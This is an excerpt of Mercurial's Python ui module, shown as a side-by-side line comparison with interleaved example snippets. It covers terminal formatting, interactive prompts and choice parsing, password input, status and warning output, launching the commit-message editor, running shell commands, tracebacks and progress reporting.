1497 return int(encoding.environ[b'COLUMNS'])
1497 return int(encoding.environ[b'COLUMNS'])
1498 except ValueError:
1498 except ValueError:
1499 pass
1499 pass
1500 return scmutil.termsize(self)[0]
1500 return scmutil.termsize(self)[0]
1501
1501
1502 def formatted(self):
1502 def formatted(self):
1503 '''should formatted output be used?
1503 '''should formatted output be used?
1504
1504
1505 It is often desirable to format the output to suit the output medium.
1505 It is often desirable to format the output to suit the output medium.
1506 Examples of this are truncating long lines or colorizing messages.
1506 Examples of this are truncating long lines or colorizing messages.
1507 However, this is often not desirable when piping output into other
1507 However, this is often not desirable when piping output into other
1508 utilities, e.g. `grep'.
1508 utilities, e.g. `grep'.
1509
1509
1510 Formatted output is triggered by the value of the `ui.formatted'
1510 Formatted output is triggered by the value of the `ui.formatted'
1511 configuration variable or - if it is unset - when `sys.stdout' points
1511 configuration variable or - if it is unset - when `sys.stdout' points
1512 to a terminal device. Please note that `ui.formatted' should be
1512 to a terminal device. Please note that `ui.formatted' should be
1513 considered an implementation detail; it is not intended for use outside
1513 considered an implementation detail; it is not intended for use outside
1514 Mercurial or its extensions.
1514 Mercurial or its extensions.
1515
1515
1516 This function refers to output only; for input, see `ui.interactive()'.
1516 This function refers to output only; for input, see `ui.interactive()'.
1517 This function always returns false when in plain mode, see `ui.plain()'.
1517 This function always returns false when in plain mode, see `ui.plain()'.
1518 '''
1518 '''
1519 if self.plain():
1519 if self.plain():
1520 return False
1520 return False
1521
1521
1522 i = self.configbool(b"ui", b"formatted")
1522 i = self.configbool(b"ui", b"formatted")
1523 if i is None:
1523 if i is None:
1524 # some environments replace stdout without implementing isatty
1524 # some environments replace stdout without implementing isatty
1525 # usually those are non-interactive
1525 # usually those are non-interactive
1526 return self._isatty(self._fout)
1526 return self._isatty(self._fout)
1527
1527
1528 return i
1528 return i
1529
1529
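# A minimal sketch showing how interactive() and formatted() can be forced
# through configuration instead of relying on isatty() detection, assuming
# Mercurial is importable as a library.  The values are illustrative, e.g.
# for producing colored output that is piped into another program.
from mercurial import ui as uimod

myui = uimod.ui.load()
myui.setconfig(b'ui', b'interactive', b'off', b'example')
myui.setconfig(b'ui', b'formatted', b'yes', b'example')
print(myui.interactive())  # False: prompts fall back to their defaults
print(myui.formatted())    # True, unless plain mode (HGPLAIN) is active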
1530 def _readline(self, prompt=b' ', promptopts=None):
1530 def _readline(self, prompt=b' ', promptopts=None):
1531 # Replacing stdin/stdout temporarily is a hard problem on Python 3
1531 # Replacing stdin/stdout temporarily is a hard problem on Python 3
1532 # because they have to be text streams with *no buffering*. Instead,
1532 # because they have to be text streams with *no buffering*. Instead,
1533 # we use rawinput() only if call_readline() will be invoked by
1533 # we use rawinput() only if call_readline() will be invoked by
1534 # PyOS_Readline(), so no I/O will be made at Python layer.
1534 # PyOS_Readline(), so no I/O will be made at Python layer.
1535 usereadline = (
1535 usereadline = (
1536 self._isatty(self._fin)
1536 self._isatty(self._fin)
1537 and self._isatty(self._fout)
1537 and self._isatty(self._fout)
1538 and procutil.isstdin(self._fin)
1538 and procutil.isstdin(self._fin)
1539 and procutil.isstdout(self._fout)
1539 and procutil.isstdout(self._fout)
1540 )
1540 )
1541 if usereadline:
1541 if usereadline:
1542 try:
1542 try:
1543 # magically add command line editing support, where
1543 # magically add command line editing support, where
1544 # available
1544 # available
1545 import readline
1545 import readline
1546
1546
1547 # force demandimport to really load the module
1547 # force demandimport to really load the module
1548 readline.read_history_file
1548 readline.read_history_file
1549 # windows sometimes raises something other than ImportError
1549 # windows sometimes raises something other than ImportError
1550 except Exception:
1550 except Exception:
1551 usereadline = False
1551 usereadline = False
1552
1552
1553 if self._colormode == b'win32' or not usereadline:
1553 if self._colormode == b'win32' or not usereadline:
1554 if not promptopts:
1554 if not promptopts:
1555 promptopts = {}
1555 promptopts = {}
1556 self._writemsgnobuf(
1556 self._writemsgnobuf(
1557 self._fmsgout, prompt, type=b'prompt', **promptopts
1557 self._fmsgout, prompt, type=b'prompt', **promptopts
1558 )
1558 )
1559 self.flush()
1559 self.flush()
1560 prompt = b' '
1560 prompt = b' '
1561 else:
1561 else:
1562 prompt = self.label(prompt, b'ui.prompt') + b' '
1562 prompt = self.label(prompt, b'ui.prompt') + b' '
1563
1563
1564 # prompt ' ' must exist; otherwise readline may delete entire line
1564 # prompt ' ' must exist; otherwise readline may delete entire line
1565 # - http://bugs.python.org/issue12833
1565 # - http://bugs.python.org/issue12833
1566 with self.timeblockedsection(b'stdio'):
1566 with self.timeblockedsection(b'stdio'):
1567 if usereadline:
1567 if usereadline:
1568 self.flush()
1568 self.flush()
1569 prompt = encoding.strfromlocal(prompt)
1569 prompt = encoding.strfromlocal(prompt)
1570 line = encoding.strtolocal(pycompat.rawinput(prompt))
1570 line = encoding.strtolocal(pycompat.rawinput(prompt))
1571 # When stdin is in binary mode on Windows, it can cause
1571 # When stdin is in binary mode on Windows, it can cause
1572 # raw_input() to emit an extra trailing carriage return
1572 # raw_input() to emit an extra trailing carriage return
1573 if pycompat.oslinesep == b'\r\n' and line.endswith(b'\r'):
1573 if pycompat.oslinesep == b'\r\n' and line.endswith(b'\r'):
1574 line = line[:-1]
1574 line = line[:-1]
1575 else:
1575 else:
1576 self._fout.write(pycompat.bytestr(prompt))
1576 self._fout.write(pycompat.bytestr(prompt))
1577 self._fout.flush()
1577 self._fout.flush()
1578 line = self._fin.readline()
1578 line = self._fin.readline()
1579 if not line:
1579 if not line:
1580 raise EOFError
1580 raise EOFError
1581 line = line.rstrip(pycompat.oslinesep)
1581 line = line.rstrip(pycompat.oslinesep)
1582
1582
1583 return line
1583 return line
1584
1584
1585 def prompt(self, msg, default=b"y"):
1585 def prompt(self, msg, default=b"y"):
1586 """Prompt user with msg, read response.
1586 """Prompt user with msg, read response.
1587 If ui is not interactive, the default is returned.
1587 If ui is not interactive, the default is returned.
1588 """
1588 """
1589 return self._prompt(msg, default=default)
1589 return self._prompt(msg, default=default)
1590
1590
1591 def _prompt(self, msg, **opts):
1591 def _prompt(self, msg, **opts):
1592 default = opts['default']
1592 default = opts['default']
1593 if not self.interactive():
1593 if not self.interactive():
1594 self._writemsg(self._fmsgout, msg, b' ', type=b'prompt', **opts)
1594 self._writemsg(self._fmsgout, msg, b' ', type=b'prompt', **opts)
1595 self._writemsg(
1595 self._writemsg(
1596 self._fmsgout, default or b'', b"\n", type=b'promptecho'
1596 self._fmsgout, default or b'', b"\n", type=b'promptecho'
1597 )
1597 )
1598 return default
1598 return default
1599 try:
1599 try:
1600 r = self._readline(prompt=msg, promptopts=opts)
1600 r = self._readline(prompt=msg, promptopts=opts)
1601 if not r:
1601 if not r:
1602 r = default
1602 r = default
1603 if self.configbool(b'ui', b'promptecho'):
1603 if self.configbool(b'ui', b'promptecho'):
1604 self._writemsg(self._fmsgout, r, b"\n", type=b'promptecho')
1604 self._writemsg(self._fmsgout, r, b"\n", type=b'promptecho')
1605 return r
1605 return r
1606 except EOFError:
1606 except EOFError:
1607 raise error.ResponseExpected()
1607 raise error.ResponseExpected()
1608
1608
1609 @staticmethod
1609 @staticmethod
1610 def extractchoices(prompt):
1610 def extractchoices(prompt):
1611 """Extract prompt message and list of choices from specified prompt.
1611 """Extract prompt message and list of choices from specified prompt.
1612
1612
1613 This returns tuple "(message, choices)", and "choices" is the
1613 This returns tuple "(message, choices)", and "choices" is the
1614 list of tuple "(response character, text without &)".
1614 list of tuple "(response character, text without &)".
1615
1615
1616 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1616 >>> ui.extractchoices(b"awake? $$ &Yes $$ &No")
1617 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1617 ('awake? ', [('y', 'Yes'), ('n', 'No')])
1618 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1618 >>> ui.extractchoices(b"line\\nbreak? $$ &Yes $$ &No")
1619 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1619 ('line\\nbreak? ', [('y', 'Yes'), ('n', 'No')])
1620 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1620 >>> ui.extractchoices(b"want lots of $$money$$?$$Ye&s$$N&o")
1621 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1621 ('want lots of $$money$$?', [('s', 'Yes'), ('o', 'No')])
1622 """
1622 """
1623
1623
1624 # Sadly, the prompt string may have been built with a filename
1624 # Sadly, the prompt string may have been built with a filename
1625 # containing "$$" so let's try to find the first valid-looking
1625 # containing "$$" so let's try to find the first valid-looking
1626 # prompt to start parsing. Sadly, we also can't rely on
1626 # prompt to start parsing. Sadly, we also can't rely on
1627 # choices containing spaces, ASCII, or basically anything
1627 # choices containing spaces, ASCII, or basically anything
1628 # except an ampersand followed by a character.
1628 # except an ampersand followed by a character.
1629 m = re.match(br'(?s)(.+?)\$\$([^\$]*&[^ \$].*)', prompt)
1629 m = re.match(br'(?s)(.+?)\$\$([^$]*&[^ $].*)', prompt)
1630 msg = m.group(1)
1630 msg = m.group(1)
1631 choices = [p.strip(b' ') for p in m.group(2).split(b'$$')]
1631 choices = [p.strip(b' ') for p in m.group(2).split(b'$$')]
1632
1632
1633 def choicetuple(s):
1633 def choicetuple(s):
1634 ampidx = s.index(b'&')
1634 ampidx = s.index(b'&')
1635 return s[ampidx + 1 : ampidx + 2].lower(), s.replace(b'&', b'', 1)
1635 return s[ampidx + 1 : ampidx + 2].lower(), s.replace(b'&', b'', 1)
1636
1636
1637 return (msg, [choicetuple(s) for s in choices])
1637 return (msg, [choicetuple(s) for s in choices])
1638
1638
1639 def promptchoice(self, prompt, default=0):
1639 def promptchoice(self, prompt, default=0):
1640 """Prompt user with a message, read response, and ensure it matches
1640 """Prompt user with a message, read response, and ensure it matches
1641 one of the provided choices. The prompt is formatted as follows:
1641 one of the provided choices. The prompt is formatted as follows:
1642
1642
1643 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1643 "would you like fries with that (Yn)? $$ &Yes $$ &No"
1644
1644
1645 The index of the choice is returned. Responses are case
1645 The index of the choice is returned. Responses are case
1646 insensitive. If ui is not interactive, the default is
1646 insensitive. If ui is not interactive, the default is
1647 returned.
1647 returned.
1648 """
1648 """
1649
1649
1650 msg, choices = self.extractchoices(prompt)
1650 msg, choices = self.extractchoices(prompt)
1651 resps = [r for r, t in choices]
1651 resps = [r for r, t in choices]
1652 while True:
1652 while True:
1653 r = self._prompt(msg, default=resps[default], choices=choices)
1653 r = self._prompt(msg, default=resps[default], choices=choices)
1654 if r.lower() in resps:
1654 if r.lower() in resps:
1655 return resps.index(r.lower())
1655 return resps.index(r.lower())
1656 # TODO: shouldn't it be a warning?
1656 # TODO: shouldn't it be a warning?
1657 self._writemsg(self._fmsgout, _(b"unrecognized response\n"))
1657 self._writemsg(self._fmsgout, _(b"unrecognized response\n"))
1658
1658
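# A minimal sketch of promptchoice(), which parses the "$$ &Yes $$ &No"
# syntax via extractchoices() and returns the index of the chosen response.
# Assumes Mercurial is importable as a library; the prompt text is an
# illustrative example.
from mercurial import ui as uimod

myui = uimod.ui.load()
myui.setconfig(b'ui', b'interactive', b'off', b'example')
idx = myui.promptchoice(b'apply this change (Yn)? $$ &Yes $$ &No', default=0)
print(idx)  # 0 ("Yes"): the ui is not interactive, so the default is used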
1659 def getpass(self, prompt=None, default=None):
1659 def getpass(self, prompt=None, default=None):
1660 if not self.interactive():
1660 if not self.interactive():
1661 return default
1661 return default
1662 try:
1662 try:
1663 self._writemsg(
1663 self._writemsg(
1664 self._fmsgerr,
1664 self._fmsgerr,
1665 prompt or _(b'password: '),
1665 prompt or _(b'password: '),
1666 type=b'prompt',
1666 type=b'prompt',
1667 password=True,
1667 password=True,
1668 )
1668 )
1669 # disable getpass() only if explicitly specified. it's still valid
1669 # disable getpass() only if explicitly specified. it's still valid
1670 # to interact with tty even if fin is not a tty.
1670 # to interact with tty even if fin is not a tty.
1671 with self.timeblockedsection(b'stdio'):
1671 with self.timeblockedsection(b'stdio'):
1672 if self.configbool(b'ui', b'nontty'):
1672 if self.configbool(b'ui', b'nontty'):
1673 l = self._fin.readline()
1673 l = self._fin.readline()
1674 if not l:
1674 if not l:
1675 raise EOFError
1675 raise EOFError
1676 return l.rstrip(b'\n')
1676 return l.rstrip(b'\n')
1677 else:
1677 else:
1678 return getpass.getpass('')
1678 return getpass.getpass('')
1679 except EOFError:
1679 except EOFError:
1680 raise error.ResponseExpected()
1680 raise error.ResponseExpected()
1681
1681
1682 def status(self, *msg, **opts):
1682 def status(self, *msg, **opts):
1683 '''write status message to output (if ui.quiet is False)
1683 '''write status message to output (if ui.quiet is False)
1684
1684
1685 This adds an output label of "ui.status".
1685 This adds an output label of "ui.status".
1686 '''
1686 '''
1687 if not self.quiet:
1687 if not self.quiet:
1688 self._writemsg(self._fmsgout, type=b'status', *msg, **opts)
1688 self._writemsg(self._fmsgout, type=b'status', *msg, **opts)
1689
1689
1690 def warn(self, *msg, **opts):
1690 def warn(self, *msg, **opts):
1691 '''write warning message to output (stderr)
1691 '''write warning message to output (stderr)
1692
1692
1693 This adds an output label of "ui.warning".
1693 This adds an output label of "ui.warning".
1694 '''
1694 '''
1695 self._writemsg(self._fmsgerr, type=b'warning', *msg, **opts)
1695 self._writemsg(self._fmsgerr, type=b'warning', *msg, **opts)
1696
1696
1697 def error(self, *msg, **opts):
1697 def error(self, *msg, **opts):
1698 '''write error message to output (stderr)
1698 '''write error message to output (stderr)
1699
1699
1700 This adds an output label of "ui.error".
1700 This adds an output label of "ui.error".
1701 '''
1701 '''
1702 self._writemsg(self._fmsgerr, type=b'error', *msg, **opts)
1702 self._writemsg(self._fmsgerr, type=b'error', *msg, **opts)
1703
1703
1704 def note(self, *msg, **opts):
1704 def note(self, *msg, **opts):
1705 '''write note to output (if ui.verbose is True)
1705 '''write note to output (if ui.verbose is True)
1706
1706
1707 This adds an output label of "ui.note".
1707 This adds an output label of "ui.note".
1708 '''
1708 '''
1709 if self.verbose:
1709 if self.verbose:
1710 self._writemsg(self._fmsgout, type=b'note', *msg, **opts)
1710 self._writemsg(self._fmsgout, type=b'note', *msg, **opts)
1711
1711
1712 def debug(self, *msg, **opts):
1712 def debug(self, *msg, **opts):
1713 '''write debug message to output (if ui.debugflag is True)
1713 '''write debug message to output (if ui.debugflag is True)
1714
1714
1715 This adds an output label of "ui.debug".
1715 This adds an output label of "ui.debug".
1716 '''
1716 '''
1717 if self.debugflag:
1717 if self.debugflag:
1718 self._writemsg(self._fmsgout, type=b'debug', *msg, **opts)
1718 self._writemsg(self._fmsgout, type=b'debug', *msg, **opts)
1719 self.log(b'debug', b'%s', b''.join(msg))
1719 self.log(b'debug', b'%s', b''.join(msg))
1720
1720
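# A minimal sketch of the message helpers above: they differ only in the
# output label they apply and in which verbosity flag gates them.  Assumes
# Mercurial is importable as a library; the messages are examples.
from mercurial import ui as uimod

myui = uimod.ui.load()
myui.status(b'shown unless --quiet\n')      # label ui.status, stdout
myui.warn(b'always shown, on stderr\n')     # label ui.warning, stderr
myui.note(b'shown only with --verbose\n')   # label ui.note
myui.debug(b'shown only with --debug\n')    # label ui.debug, also logged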
1721 # Aliases to defeat check-code.
1721 # Aliases to defeat check-code.
1722 statusnoi18n = status
1722 statusnoi18n = status
1723 notenoi18n = note
1723 notenoi18n = note
1724 warnnoi18n = warn
1724 warnnoi18n = warn
1725 writenoi18n = write
1725 writenoi18n = write
1726
1726
1727 def edit(
1727 def edit(
1728 self,
1728 self,
1729 text,
1729 text,
1730 user,
1730 user,
1731 extra=None,
1731 extra=None,
1732 editform=None,
1732 editform=None,
1733 pending=None,
1733 pending=None,
1734 repopath=None,
1734 repopath=None,
1735 action=None,
1735 action=None,
1736 ):
1736 ):
1737 if action is None:
1737 if action is None:
1738 self.develwarn(
1738 self.develwarn(
1739 b'action is None but will soon be a required '
1739 b'action is None but will soon be a required '
1740 b'parameter to ui.edit()'
1740 b'parameter to ui.edit()'
1741 )
1741 )
1742 extra_defaults = {
1742 extra_defaults = {
1743 b'prefix': b'editor',
1743 b'prefix': b'editor',
1744 b'suffix': b'.txt',
1744 b'suffix': b'.txt',
1745 }
1745 }
1746 if extra is not None:
1746 if extra is not None:
1747 if extra.get(b'suffix') is not None:
1747 if extra.get(b'suffix') is not None:
1748 self.develwarn(
1748 self.develwarn(
1749 b'extra.suffix is not None but will soon be '
1749 b'extra.suffix is not None but will soon be '
1750 b'ignored by ui.edit()'
1750 b'ignored by ui.edit()'
1751 )
1751 )
1752 extra_defaults.update(extra)
1752 extra_defaults.update(extra)
1753 extra = extra_defaults
1753 extra = extra_defaults
1754
1754
1755 if action == b'diff':
1755 if action == b'diff':
1756 suffix = b'.diff'
1756 suffix = b'.diff'
1757 elif action:
1757 elif action:
1758 suffix = b'.%s.hg.txt' % action
1758 suffix = b'.%s.hg.txt' % action
1759 else:
1759 else:
1760 suffix = extra[b'suffix']
1760 suffix = extra[b'suffix']
1761
1761
1762 rdir = None
1762 rdir = None
1763 if self.configbool(b'experimental', b'editortmpinhg'):
1763 if self.configbool(b'experimental', b'editortmpinhg'):
1764 rdir = repopath
1764 rdir = repopath
1765 (fd, name) = pycompat.mkstemp(
1765 (fd, name) = pycompat.mkstemp(
1766 prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
1766 prefix=b'hg-' + extra[b'prefix'] + b'-', suffix=suffix, dir=rdir
1767 )
1767 )
1768 try:
1768 try:
1769 with os.fdopen(fd, 'wb') as f:
1769 with os.fdopen(fd, 'wb') as f:
1770 f.write(util.tonativeeol(text))
1770 f.write(util.tonativeeol(text))
1771
1771
1772 environ = {b'HGUSER': user}
1772 environ = {b'HGUSER': user}
1773 if b'transplant_source' in extra:
1773 if b'transplant_source' in extra:
1774 environ.update(
1774 environ.update(
1775 {b'HGREVISION': hex(extra[b'transplant_source'])}
1775 {b'HGREVISION': hex(extra[b'transplant_source'])}
1776 )
1776 )
1777 for label in (b'intermediate-source', b'source', b'rebase_source'):
1777 for label in (b'intermediate-source', b'source', b'rebase_source'):
1778 if label in extra:
1778 if label in extra:
1779 environ.update({b'HGREVISION': extra[label]})
1779 environ.update({b'HGREVISION': extra[label]})
1780 break
1780 break
1781 if editform:
1781 if editform:
1782 environ.update({b'HGEDITFORM': editform})
1782 environ.update({b'HGEDITFORM': editform})
1783 if pending:
1783 if pending:
1784 environ.update({b'HG_PENDING': pending})
1784 environ.update({b'HG_PENDING': pending})
1785
1785
1786 editor = self.geteditor()
1786 editor = self.geteditor()
1787
1787
1788 self.system(
1788 self.system(
1789 b"%s \"%s\"" % (editor, name),
1789 b"%s \"%s\"" % (editor, name),
1790 environ=environ,
1790 environ=environ,
1791 onerr=error.Abort,
1791 onerr=error.Abort,
1792 errprefix=_(b"edit failed"),
1792 errprefix=_(b"edit failed"),
1793 blockedtag=b'editor',
1793 blockedtag=b'editor',
1794 )
1794 )
1795
1795
1796 with open(name, 'rb') as f:
1796 with open(name, 'rb') as f:
1797 t = util.fromnativeeol(f.read())
1797 t = util.fromnativeeol(f.read())
1798 finally:
1798 finally:
1799 os.unlink(name)
1799 os.unlink(name)
1800
1800
1801 return t
1801 return t
1802
1802
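# A minimal sketch of ui.edit(): the text is written to a temporary file,
# the configured editor is run on it with HGUSER/HGEDITFORM in the
# environment, and the edited text is returned.  Assumes Mercurial is
# importable, a POSIX `true` binary, and that HGEDITOR is unset; all values
# below are illustrative.
from mercurial import ui as uimod

myui = uimod.ui.load()
# `true` exits 0 without touching the file, so the text comes back unchanged
myui.setconfig(b'ui', b'editor', b'true', b'example')
text = myui.edit(
    b'example commit message\n',
    user=b'someone@example.com',
    editform=b'commit.normal.normal',
    action=b'commit',
)
print(text)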
1803 def system(
1803 def system(
1804 self,
1804 self,
1805 cmd,
1805 cmd,
1806 environ=None,
1806 environ=None,
1807 cwd=None,
1807 cwd=None,
1808 onerr=None,
1808 onerr=None,
1809 errprefix=None,
1809 errprefix=None,
1810 blockedtag=None,
1810 blockedtag=None,
1811 ):
1811 ):
1812 '''execute shell command with appropriate output stream. command
1812 '''execute shell command with appropriate output stream. command
1813 output will be redirected if fout is not stdout.
1813 output will be redirected if fout is not stdout.
1814
1814
1815 if the command fails and onerr is None, return the exit status, else raise
1815 if the command fails and onerr is None, return the exit status, else raise
1816 the onerr object as an exception.
1816 the onerr object as an exception.
1817 '''
1817 '''
1818 if blockedtag is None:
1818 if blockedtag is None:
1819 # Long cmds tend to be because of an absolute path on cmd. Keep
1819 # Long cmds tend to be because of an absolute path on cmd. Keep
1820 # the tail end instead
1820 # the tail end instead
1821 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1821 cmdsuffix = cmd.translate(None, _keepalnum)[-85:]
1822 blockedtag = b'unknown_system_' + cmdsuffix
1822 blockedtag = b'unknown_system_' + cmdsuffix
1823 out = self._fout
1823 out = self._fout
1824 if any(s[1] for s in self._bufferstates):
1824 if any(s[1] for s in self._bufferstates):
1825 out = self
1825 out = self
1826 with self.timeblockedsection(blockedtag):
1826 with self.timeblockedsection(blockedtag):
1827 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1827 rc = self._runsystem(cmd, environ=environ, cwd=cwd, out=out)
1828 if rc and onerr:
1828 if rc and onerr:
1829 errmsg = b'%s %s' % (
1829 errmsg = b'%s %s' % (
1830 os.path.basename(cmd.split(None, 1)[0]),
1830 os.path.basename(cmd.split(None, 1)[0]),
1831 procutil.explainexit(rc),
1831 procutil.explainexit(rc),
1832 )
1832 )
1833 if errprefix:
1833 if errprefix:
1834 errmsg = b'%s: %s' % (errprefix, errmsg)
1834 errmsg = b'%s: %s' % (errprefix, errmsg)
1835 raise onerr(errmsg)
1835 raise onerr(errmsg)
1836 return rc
1836 return rc
1837
1837
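# A minimal sketch of ui.system() error handling: with onerr=None the exit
# status is returned, with onerr set a non-zero status is raised as that
# exception, prefixed by errprefix.  Assumes Mercurial is importable and a
# POSIX `false` binary; the command and tag are illustrative.
from mercurial import error, ui as uimod

myui = uimod.ui.load()
rc = myui.system(b'false', blockedtag=b'example')
print(rc)  # non-zero exit status, no exception

try:
    myui.system(
        b'false',
        onerr=error.Abort,
        errprefix=b'example failed',
        blockedtag=b'example',
    )
except error.Abort:
    print('non-zero status was converted into an Abort')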
1838 def _runsystem(self, cmd, environ, cwd, out):
1838 def _runsystem(self, cmd, environ, cwd, out):
1839 """actually execute the given shell command (can be overridden by
1839 """actually execute the given shell command (can be overridden by
1840 extensions like chg)"""
1840 extensions like chg)"""
1841 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1841 return procutil.system(cmd, environ=environ, cwd=cwd, out=out)
1842
1842
1843 def traceback(self, exc=None, force=False):
1843 def traceback(self, exc=None, force=False):
1844 '''print exception traceback if traceback printing is enabled or forced.
1844 '''print exception traceback if traceback printing is enabled or forced.
1845 Only to be called in an exception handler. Returns True if a traceback
1845 Only to be called in an exception handler. Returns True if a traceback
1846 was printed.'''
1846 was printed.'''
1847 if self.tracebackflag or force:
1847 if self.tracebackflag or force:
1848 if exc is None:
1848 if exc is None:
1849 exc = sys.exc_info()
1849 exc = sys.exc_info()
1850 cause = getattr(exc[1], 'cause', None)
1850 cause = getattr(exc[1], 'cause', None)
1851
1851
1852 if cause is not None:
1852 if cause is not None:
1853 causetb = traceback.format_tb(cause[2])
1853 causetb = traceback.format_tb(cause[2])
1854 exctb = traceback.format_tb(exc[2])
1854 exctb = traceback.format_tb(exc[2])
1855 exconly = traceback.format_exception_only(cause[0], cause[1])
1855 exconly = traceback.format_exception_only(cause[0], cause[1])
1856
1856
1857 # exclude frame where 'exc' was chained and rethrown from exctb
1857 # exclude frame where 'exc' was chained and rethrown from exctb
1858 self.write_err(
1858 self.write_err(
1859 b'Traceback (most recent call last):\n',
1859 b'Traceback (most recent call last):\n',
1860 encoding.strtolocal(''.join(exctb[:-1])),
1860 encoding.strtolocal(''.join(exctb[:-1])),
1861 encoding.strtolocal(''.join(causetb)),
1861 encoding.strtolocal(''.join(causetb)),
1862 encoding.strtolocal(''.join(exconly)),
1862 encoding.strtolocal(''.join(exconly)),
1863 )
1863 )
1864 else:
1864 else:
1865 output = traceback.format_exception(exc[0], exc[1], exc[2])
1865 output = traceback.format_exception(exc[0], exc[1], exc[2])
1866 self.write_err(encoding.strtolocal(''.join(output)))
1866 self.write_err(encoding.strtolocal(''.join(output)))
1867 return self.tracebackflag or force
1867 return self.tracebackflag or force
1868
1868
1869 def geteditor(self):
1869 def geteditor(self):
1870 '''return editor to use'''
1870 '''return editor to use'''
1871 if pycompat.sysplatform == b'plan9':
1871 if pycompat.sysplatform == b'plan9':
1872 # vi is the MIPS instruction simulator on Plan 9. We
1872 # vi is the MIPS instruction simulator on Plan 9. We
1873 # instead default to E to plumb commit messages to
1873 # instead default to E to plumb commit messages to
1874 # avoid confusion.
1874 # avoid confusion.
1875 editor = b'E'
1875 editor = b'E'
1876 else:
1876 else:
1877 editor = b'vi'
1877 editor = b'vi'
1878 return encoding.environ.get(b"HGEDITOR") or self.config(
1878 return encoding.environ.get(b"HGEDITOR") or self.config(
1879 b"ui", b"editor", editor
1879 b"ui", b"editor", editor
1880 )
1880 )
1881
1881
1882 @util.propertycache
1882 @util.propertycache
1883 def _progbar(self):
1883 def _progbar(self):
1884 """setup the progbar singleton to the ui object"""
1884 """setup the progbar singleton to the ui object"""
1885 if (
1885 if (
1886 self.quiet
1886 self.quiet
1887 or self.debugflag
1887 or self.debugflag
1888 or self.configbool(b'progress', b'disable')
1888 or self.configbool(b'progress', b'disable')
1889 or not progress.shouldprint(self)
1889 or not progress.shouldprint(self)
1890 ):
1890 ):
1891 return None
1891 return None
1892 return getprogbar(self)
1892 return getprogbar(self)
1893
1893
1894 def _progclear(self):
1894 def _progclear(self):
1895 """clear progress bar output if any. use it before any output"""
1895 """clear progress bar output if any. use it before any output"""
1896 if not haveprogbar(): # nothing loaded yet
1896 if not haveprogbar(): # nothing loaded yet
1897 return
1897 return
1898 if self._progbar is not None and self._progbar.printed:
1898 if self._progbar is not None and self._progbar.printed:
1899 self._progbar.clear()
1899 self._progbar.clear()
1900
1900
1901 def progress(self, topic, pos, item=b"", unit=b"", total=None):
1901 def progress(self, topic, pos, item=b"", unit=b"", total=None):
1902 '''show a progress message
1902 '''show a progress message
1903
1903
1904 By default a textual progress bar will be displayed if an operation
1904 By default a textual progress bar will be displayed if an operation
1905 takes too long. 'topic' is the current operation, 'item' is a
1905 takes too long. 'topic' is the current operation, 'item' is a
1906 non-numeric marker of the current position (i.e. the currently
1906 non-numeric marker of the current position (i.e. the currently
1907 in-process file), 'pos' is the current numeric position (i.e.
1907 in-process file), 'pos' is the current numeric position (i.e.
1908 revision, bytes, etc.), unit is a corresponding unit label,
1908 revision, bytes, etc.), unit is a corresponding unit label,
1909 and total is the highest expected pos.
1909 and total is the highest expected pos.
1910
1910
1911 Multiple nested topics may be active at a time.
1911 Multiple nested topics may be active at a time.
1912
1912
1913 All topics should be marked closed by setting pos to None at
1913 All topics should be marked closed by setting pos to None at
1914 termination.
1914 termination.
1915 '''
1915 '''
1916 self.deprecwarn(
1916 self.deprecwarn(
1917 b"use ui.makeprogress() instead of ui.progress()", b"5.1"
1917 b"use ui.makeprogress() instead of ui.progress()", b"5.1"
1918 )
1918 )
1919 progress = self.makeprogress(topic, unit, total)
1919 progress = self.makeprogress(topic, unit, total)
1920 if pos is not None:
1920 if pos is not None:
1921 progress.update(pos, item=item)
1921 progress.update(pos, item=item)
1922 else:
1922 else:
1923 progress.complete()
1923 progress.complete()
1924
1924
1925 def makeprogress(self, topic, unit=b"", total=None):
1925 def makeprogress(self, topic, unit=b"", total=None):
1926 """Create a progress helper for the specified topic"""
1926 """Create a progress helper for the specified topic"""
1927 if getattr(self._fmsgerr, 'structured', False):
1927 if getattr(self._fmsgerr, 'structured', False):
1928 # channel for machine-readable output with metadata, just send
1928 # channel for machine-readable output with metadata, just send
1929 # raw information
1929 # raw information
1930 # TODO: consider porting some useful information (e.g. estimated
1930 # TODO: consider porting some useful information (e.g. estimated
1931 # time) from progbar. we might want to support update delay to
1931 # time) from progbar. we might want to support update delay to
1932 # reduce the cost of transferring progress messages.
1932 # reduce the cost of transferring progress messages.
1933 def updatebar(topic, pos, item, unit, total):
1933 def updatebar(topic, pos, item, unit, total):
1934 self._fmsgerr.write(
1934 self._fmsgerr.write(
1935 None,
1935 None,
1936 type=b'progress',
1936 type=b'progress',
1937 topic=topic,
1937 topic=topic,
1938 pos=pos,
1938 pos=pos,
1939 item=item,
1939 item=item,
1940 unit=unit,
1940 unit=unit,
1941 total=total,
1941 total=total,
1942 )
1942 )
1943
1943
1944 elif self._progbar is not None:
1944 elif self._progbar is not None:
1945 updatebar = self._progbar.progress
1945 updatebar = self._progbar.progress
1946 else:
1946 else:
1947
1947
1948 def updatebar(topic, pos, item, unit, total):
1948 def updatebar(topic, pos, item, unit, total):
1949 pass
1949 pass
1950
1950
1951 return scmutil.progress(self, updatebar, topic, unit, total)
1951 return scmutil.progress(self, updatebar, topic, unit, total)
1952
1952
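# A minimal sketch of makeprogress(): the returned helper's update() and
# complete() calls drive either the progress bar or the structured output
# channel, as described above.  Assumes Mercurial is importable; topic,
# unit and total are illustrative.
from mercurial import ui as uimod

myui = uimod.ui.load()
progress = myui.makeprogress(b'examples', unit=b'items', total=3)
for pos, item in enumerate([b'a', b'b', b'c']):
    progress.update(pos, item=item)
progress.complete()  # close the topic when done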
1953 def getlogger(self, name):
1953 def getlogger(self, name):
1954 """Returns a logger of the given name; or None if not registered"""
1954 """Returns a logger of the given name; or None if not registered"""
1955 return self._loggers.get(name)
1955 return self._loggers.get(name)
1956
1956
1957 def setlogger(self, name, logger):
1957 def setlogger(self, name, logger):
1958 """Install logger which can be identified later by the given name
